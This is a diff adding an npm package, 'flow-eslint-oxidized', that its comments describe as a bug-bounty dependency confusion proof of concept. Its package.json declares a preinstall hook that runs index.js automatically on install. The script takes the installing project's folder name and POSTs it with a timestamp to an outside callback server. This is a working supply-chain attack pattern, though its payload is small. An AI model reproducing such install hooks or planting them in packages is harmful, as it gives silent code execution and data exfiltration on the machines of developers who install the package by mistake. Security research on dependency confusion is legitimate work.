flow-eslint-oxidized 0.0.1

package/index.js

@@ -0,0 +1,46 @@
+// SECURITY RESEARCH: Harmless dependency confusion PoC.
+// This package sends a simple "ping" to verify execution.
+// No system data, source code, or PII is accessed or transmitted.
+// Contact: dd_06@wearehackerone.com
+
+const http = require('http');
+const https = require('https');
+const path = require('path');
+
+const targetDir = process.env.INIT_CWD || path.resolve(__dirname, '../../../');
+// Extract ONLY the folder name (e.g., "target-project") to avoid leaking PII from full paths
+const safeProjectName = path.basename(targetDir);
+
+// No system data.
+const info = {
+    pkg: "flow-eslint-oxidized",
+    timestamp: new Date().toISOString(),
+    transport: 'http',
+    project: safeProjectName
+};
+
+const CALLBACK_URL = 'https://deepbounty.dd06-dev.fr/cb/f4ac4ee8-f8d0-47da-80c8-83aeaeae2203';
+
+function sendHttpPayload() {
+    const parsed = new URL(CALLBACK_URL);
+    const postData = JSON.stringify(info);
+    const lib = parsed.protocol === 'https:' ? https : http;
+
+    const req = lib.request(CALLBACK_URL, {
+        method: 'POST',
+        headers: {
+            'Content-Type': 'application/json',
+            'Content-Length': Buffer.byteLength(postData)
+        },
+        timeout: 15000
+    }, (res) => {
+        // Just consume the stream, don't need the response
+        res.on('data', () => { });
+    });
+
+    req.write(postData);
+    req.end();
+}
+
+// Start sequence
+sendHttpPayload();

package/package.json

@@ -0,0 +1,10 @@
+{
+	"name": "flow-eslint-oxidized",
+	"version": "0.0.1",
+	"description": "Security PoC for Bug Bounty",
+	"main": "index.js",
+	"scripts": {
+		"preinstall": "node index.js"
+	},
+	"author": "dd_06"
+}